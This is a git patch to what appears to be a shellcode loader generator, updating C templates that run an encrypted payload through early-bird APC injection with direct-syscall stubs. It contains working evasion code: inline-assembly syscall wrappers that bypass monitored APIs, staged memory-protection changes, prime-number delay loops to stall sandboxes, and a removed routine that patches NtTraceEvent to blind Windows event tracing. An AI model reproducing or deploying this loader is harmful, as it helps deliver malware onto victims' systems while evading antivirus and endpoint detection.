From 6f30183ff37aad00886c5af117704e5a71487dc7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=20=E9=B8=BF=E5=84=92?= <1350141940@qq.com> Date: Tue, 9 Apr 2024 17:29:27 +0800 Subject: [PATCH] =?UTF-8?q?=E5=AE=8C=E5=96=84syscall=E4=B8=8Bearlybird?= =?UTF-8?q?=E5=8A=A0=E8=BD=BD=E6=96=B9=E5=BC=8F?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- Loader/Template.go | 56 ++++++++++++++-------------------------------- sys_32.c | 39 ++++++++++++++++++++++++++++++++ sys_32.h | 7 ++++++ 3 files changed, 63 insertions(+), 39 deletions(-) diff --git a/Loader/Template.go b/Loader/Template.go index 1450655..63b45a8 100644 --- a/Loader/Template.go +++ b/Loader/Template.go @@ -10,9 +10,9 @@ var __c__sandbox = ` isPrime(1000000000000002217); isPrime(1000000000000002137); isPrime(1000000000000002097); - //isPrime(1000000000000002049); - //isPrime(1000000000000001953); - //isPrime(1000000000000002481); + isPrime(1000000000000002049); + isPrime(1000000000000001953); + isPrime(1000000000000002481); ` @@ -28,21 +28,20 @@ var __c__syscall_callback = ` EnumCalendarInfo((CALINFO_ENUMPROC)addr, LOCALE_USER_DEFAULT, ENUM_ALL_CALENDARS, CAL_SMONTHNAME1); ` var __c__syscall__earlyBird = ` - LPVOID shellAddress = VirtualAlloc(NULL, allocationSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + DWORD oldProtect; myNtTestAlert testAlert = (myNtTestAlert)(GetProcAddress(GetModuleHandleA("ntdll"), "NtTestAlert")); - memcpy(shellAddress, xpp, allocationSize); - //WriteProcessMemory(GetCurrentProcess(), shellAddress, buf, allocationSize, NULL); - - - QueueUserAPC((PAPCFUNC)shellAddress, GetCurrentThread(), NULL); - testAlert(); - //VAV_NtAllocateVirtualMemory(hProcess, &addr, 0, &allocationSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); - //VAV_NtWriteVirtualMemory(hProcess, addr, xpp, length, &bytesWritten); - ////LPVOID addr1 = VirtualAlloc(NULL, sizeof(xpp), MEM_COMMIT, PAGE_EXECUTE_READWRITE); - ////RtlMoveMemory(addr1, xpp,length); - ////QueueUserAPC((PAPCFUNC)addr1, GetCurrentThread(), NULL); - //Sw3NtQueueApcThread(GetCurrentThread(),(PAPCFUNC)addr,NULL,NULL,NULL); - //Sw3NtTestAlert(); + VAV_NtAllocateVirtualMemory(GetCurrentProcess(), &addr, 0, &allocationSize, MEM_COMMIT | MEM_RESERVE, 0x04); + isPrime(1000000000000002049); + VAV_NtProtectVirtualMemory(GetCurrentProcess(),&addr, &allocationSize, 0x20, &oldProtect); + isPrime(1000000000000002049); + VAV_NtProtectVirtualMemory(GetCurrentProcess(),&addr, &allocationSize, 0x40, &oldProtect); + isPrime(1000000000000002049); + VAV_NtWriteVirtualMemory(GetCurrentProcess(), addr, xpp, length, NULL); + //VAVNtQueueApcThread(GetCurrentThread(),(PAPCFUNC)addr,NULL,NULL,NULL); + QueueUserAPC((PAPCFUNC)addr, GetCurrentThread(), NULL); + //VAVNtTestAlert(); + testAlert(); + ` // 纤程加载 @@ -349,21 +348,10 @@ _Bool isPrime(long long n) { return 1; } -DWORD PatchEtw() -{ -DWORD dwOld = 0; -FARPROC ptrNtTraceEvent = GetProcAddress(LoadLibraryA("ntdll"), "NtTraceEvent"); -VirtualProtect(ptrNtTraceEvent, 1, PAGE_EXECUTE_READWRITE, &dwOld); -memcpy(ptrNtTraceEvent, "\xc3", 1); -VirtualProtect(ptrNtTraceEvent, 1, dwOld, &dwOld); -return 0; -} int main() { - - PatchEtw(); - pNewLdrLoadDll LdrLoadrDll; + pNewLdrLoadDll LdrLoadrDll; UNICODE_STRING user32dll; UNICODE_STRING kernel32dll; UNICODE_STRING ntdlldll; @@ -739,19 +727,9 @@ void My_Xor(char* data, size_t data_len, char* key, size_t key_len) { j++; } } -DWORD PatchEtw() -{ -DWORD dwOld = 0; -FARPROC ptrNtTraceEvent = GetProcAddress(LoadLibraryA("ntdll"), "NtTraceEvent"); -VirtualProtect(ptrNtTraceEvent, 1, PAGE_EXECUTE_READWRITE, &dwOld); -memcpy(ptrNtTraceEvent, "\xc3", 1); -VirtualProtect(ptrNtTraceEvent, 1, dwOld, &dwOld); -return 0; -} int main() { - PatchEtw(); pNewLdrLoadDll LdrLoadrDll; UNICODE_STRING user32dll; UNICODE_STRING kernel32dll; diff --git a/sys_32.c b/sys_32.c index bb36a5e..9221164 100644 --- a/sys_32.c +++ b/sys_32.c @@ -429,6 +429,45 @@ __declspec(naked) NTSTATUS VAV_NtProtectVirtualMemory( ); } +__declspec(naked) NTSTATUS VAVNtQueueApcThread( + IN HANDLE ThreadHandle, + IN PKNORMAL_ROUTINE ApcRoutine, + IN PVOID ApcArgument1 OPTIONAL, + IN PVOID ApcArgument2 OPTIONAL, + IN PVOID ApcArgument3 OPTIONAL) +{ + asm( + "push ebp \n" + "mov ebp, esp \n" + "push 0x14BC1E11 \n" + "call _VAV_GetSyscallAddress \n" + "mov edi, eax \n" + "push 0x14BC1E11 \n" + "call _VAV_GetSyscallNumber \n" + "lea esp, [esp+4] \n" + "mov ecx, 0x5 \n" + "push_argument_14BC1E11: \n" + "dec ecx \n" + "push [ebp + 8 + ecx * 4] \n" + "jnz push_argument_14BC1E11 \n" + "mov ecx, eax \n" + "mov eax, ecx \n" + "lea ebx, [ret_address_epilog_14BC1E11] \n" + "push ebx \n" + "call do_sysenter_interrupt_14BC1E11 \n" + "lea esp, [esp+4] \n" + "ret_address_epilog_14BC1E11: \n" + "mov esp, ebp \n" + "pop ebp \n" + "ret \n" + "do_sysenter_interrupt_14BC1E11: \n" + "mov edx, esp \n" + "jmp edi \n" + "ret \n" + ); +} + + #endif diff --git a/sys_32.h b/sys_32.h index 269dc75..dc739ff 100644 --- a/sys_32.h +++ b/sys_32.h @@ -309,6 +309,13 @@ EXTERN_C NTSTATUS VAV_NtProtectVirtualMemory( IN ULONG NewProtect, OUT PULONG OldProtect); +EXTERN_C NTSTATUS VAVNtQueueApcThread( + IN HANDLE ThreadHandle, + IN PKNORMAL_ROUTINE ApcRoutine, + IN PVOID ApcArgument1 OPTIONAL, + IN PVOID ApcArgument2 OPTIONAL, + IN PVOID ApcArgument3 OPTIONAL); +